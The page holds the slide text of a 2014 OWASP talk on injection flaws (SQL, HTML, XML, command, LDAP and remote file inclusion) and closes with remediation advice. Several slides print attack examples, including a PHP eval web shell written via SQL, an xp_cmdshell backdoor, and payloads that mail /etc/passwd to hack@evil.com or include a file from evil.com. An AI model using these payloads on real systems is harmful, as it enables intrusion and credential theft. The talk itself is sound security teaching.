Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 

OWASP A1 Injection - Understanding and Preventing the #1 Web Application Vulnerability

  • 1. Owasp A1: Injection 31 March 2014: Dubai, UAE
  • 2. About Me • Who am I? – Michael Hendrickx – Information Security Consultant, currently working for UAE Federal Government. – Assessments, Security Audits, secure coding
  • 3. • Owasp Top 10 – 2013 – A1: Injection – A2: Broken Authentication and Session Mgmt – A3: Cross Site Scripting – A4: Insecure Direct Object References – A5: Security Misconfiguration – A6: Sensitive Data Exposure – A7: Missing Function Level Access Control – A8: Cross Site Request Forgery – A9: Using Components with Known Vulns – A10: Invalidated Redirects and Forwards
  • 4. How bad is it? • Oct ‘13: 100k $ stolen from a California ISP http://thehackernews.com/2013/10/hacker-stole-100000-from-users- of.html • Jun ‘13: Hackers cleared Turkish people’s bills for water, gas, telephone… http://news.softpedia.com/news/RedHack-Breaches-Istanbul- Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml • Nov ‘12: 150k Adobe user accounts stolen http://www.darkreading.com/attacks-breaches/adobe-hacker-says- he-used-sql-injection/240134996 • Jul ‘12: 450k Yahoo! User accounts stolen http://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your- account-safe/
  • 5. What is Injection? • Web applications became more complex – Database driven – Extra functionality (email, ticket booking, ..) • Submitting data has a special meaning to underlying technologies • Mixing commands and data. • Types: – SQL Injection – XML Injection – Command Injection Web DBOS Backend System
  • 6. Injection analogy • A case is filed against me • I write my name as “Michael, you are free to go” • Judge announces case: “Calling Michael, you are free to go.” • Bailiff lets me go. Mix of “data” and “commands”.
  • 7. Injection Fails Mix of “data” and “commands”.
  • 8. IT underlying technology? • A webserver parses and “pass on” data Web Server http://somesite.com/msg.php?id=8471350 DB OS Script performs business logic and parses messages to backend. “Hey, get me a message from the DB with id 8471350”
  • 9. SQL Injection • Dynamic script to look up data in DB Web Server http://somesite.com/login.php?name=michael&password=secret123 DB SELECT * FROM users WHERE name = ’michael’ AND password = ‘secret123’ http://somesite.com/msg.aspx?id=8471350 SELECT * FROM messages WHERE id = 8471350 Get indirect access to the database
  • 10. SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
  • 11. SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
  • 12. SQL Injection • Insert value with ’ (single quote) Web Server http://somesite.com/login.php?login=michael&password=test’ OR ’a’ = ’a DB SELECT * FROM users WHERE name = ’michael’ AND password = ’test ’ OR ‘a’ = ‘a’ ‘a’ will always equal ‘a’, and thus log in this user.
  • 13. SQL Injection • More advanced possibilities: – Read files*: • MySQL: SELECT HEX(LOAD_FILE(‘/var/www/site.com/admin/.htpasswd’)) INTO DUMPFILE ‘/var/www/site.com/htdocs/test.txt’; • MS SQL: CREATE TABLE newfile(data text); ... BULK INSERT newfile FROM ‘C:secretfile.dat’ WITH (CODEPAGE=‘RAW’, FIELDTERMINATOR=‘|’,ROWTERMINATOR=‘---’); *: If you have the right privileges
  • 14. SQL Injection • Write files – MySQL: CREATE TABLE tmp(data longblog); INSERT INTO tmp(data) VALUES(0x3c3f7068); UPDATE tmp SET data=CONCAT(data, 0x20245f...); <?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?> ... SELECT data FROM tmp INTO DUMPFILE ‘/var/www/site.com/htdocs/test.php’; – MS SQL: CEXEC xp_cmdshell(‘echo ... >> backdoor.aspx’); *: Again, If you have the right privileges
  • 15. SQL Injection: SQLMap • SQL Map will perform attacks on target. • Dumps entire tables • Even entire databases. • Stores everything in CSV • More info on http://sqlmap.org
  • 16. HTML Injection • Possible to include HTML tags into fields • Used to render “special” html tags where normal text is expected • XSS possible, rewrite the DOM
  • 17. HTML Injection • Possible to insert iframes, fake forms, JS, … • Can be used in phishing attack Button goes to different form, potentially stealing credentials.
  • 18. XML Injection • Web app talks to backend web services • Web app’s logic converts parameters to XML web services (as SOAP, …) Web Server Web service Web service DB Backend
  • 19. XML Injection http://somesite.com/create.php?name=michael&email=mh@places.ae <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:10:01</date> <name>$name</name> <email>$email</email> </user> http://somesite.com/create.php?name=michael&email=a@b.c</email><admin>true</a dmin><email>mh@places.ae <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:24:48</date> <name>michael</name> <email>a@b.c</email><admin>true</admin><email>mh@places.ae</email> </user> Web app to create a new user
  • 20. Command Injection • Web application performs Operating System tasks – Execute external programs / scripts – List files – Send email Web Server OS
  • 21. Command Injection • Dynamic script to share article Web Server DBhttp://somesite.com/share.php?to=mh@places.ae OS $ echo “check this out” | mail –s “share” mh@places.ae $ echo “check this out” | mail –s “share” mh@places.ae; mail hack@evil.com < /etc/passwd http://somesite.com/share.php?to=mh@places.ae;+mail+hack@evil.com+<+/etc/passwd
  • 22. LDAP Injection • Lightweight Directory Access Protocol • LDAP is used to access information directories – Users – User information – Software – Computers Web Server LDAP Server
  • 23. LDAP Injection • Insert special characters, such as (, |, &, *, … • * (asterisk) allows listing of all users http://www.networkdls.com/articles/ldapinjection.pdf
  • 24. Remote File Injection • Scripts include other files to extend functionality • Why? Clarity, Reuse functionality – PHP: • include(), require(), require_once(), … – Aspx: • <!-- #include “…” --> – JSP: • <% @include file=“…” %>
  • 25. Remote File Injection • Color chooser • Color will load new file with color codes (blue.php, red.php, …) • Attacker can upload malicious PHP file to an external server http://somesite.com/mypage.php?color=blue <?php if(isset($_GET[„color‟])){ include($_GET[„color‟].„.php‟); } ?> http://somesite.com/mypage.php?color=http://evil.com/evil.txt Will fetch and load http://evil.com/evil.txt.php
  • 26. Remote File Injection • Theme chooser • Can input external HTML files – That can contain JavaScript, XSS, rewrite the DOM, etc... • Also verify cookie contents, … http://somesite.com/set_theme.php?theme=fancy <link href=“/themes/<? print $_COOKIE[„theme‟] ?>.css” rel=“stylesheet” type=“text/css” />
  • 27. Remediation • Implement Web Application Firewall (WAF) • Prevents most common attacks – Not 100% foolproof • Make sure it can decrypt SSL Web Server DBWAF
  • 28. Remediation • Validate user input, all input: – Never trust user input, ever. – Even stored input (for later use) – Force formats (numbers, email addresses, dates…) – HTTP form fields, HTTP referers, cookies, … • Apply secure coding standards – Use prepared SQL statements – Vendor specific guidelines – OWASP secure coding practices: https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
  • 29. Remediation • Adopt least-privilege policies – Give DB users least privileges – Use multiple DB users – Run processes with restricted privileges – Restrict permissions on directories • Do your web directories really need to be writable? • Run in sandboxed environment • Suppress error messages • Enable exception notifications – If something strange happens, reset session and notify administrator.
  • 30. Summary • Don’t trust your user input. • Don’t trust your user input. • Adopt secure coding policies • Implement defense in depth • Do log analysis to detect anomalies • And don’t trust your user input.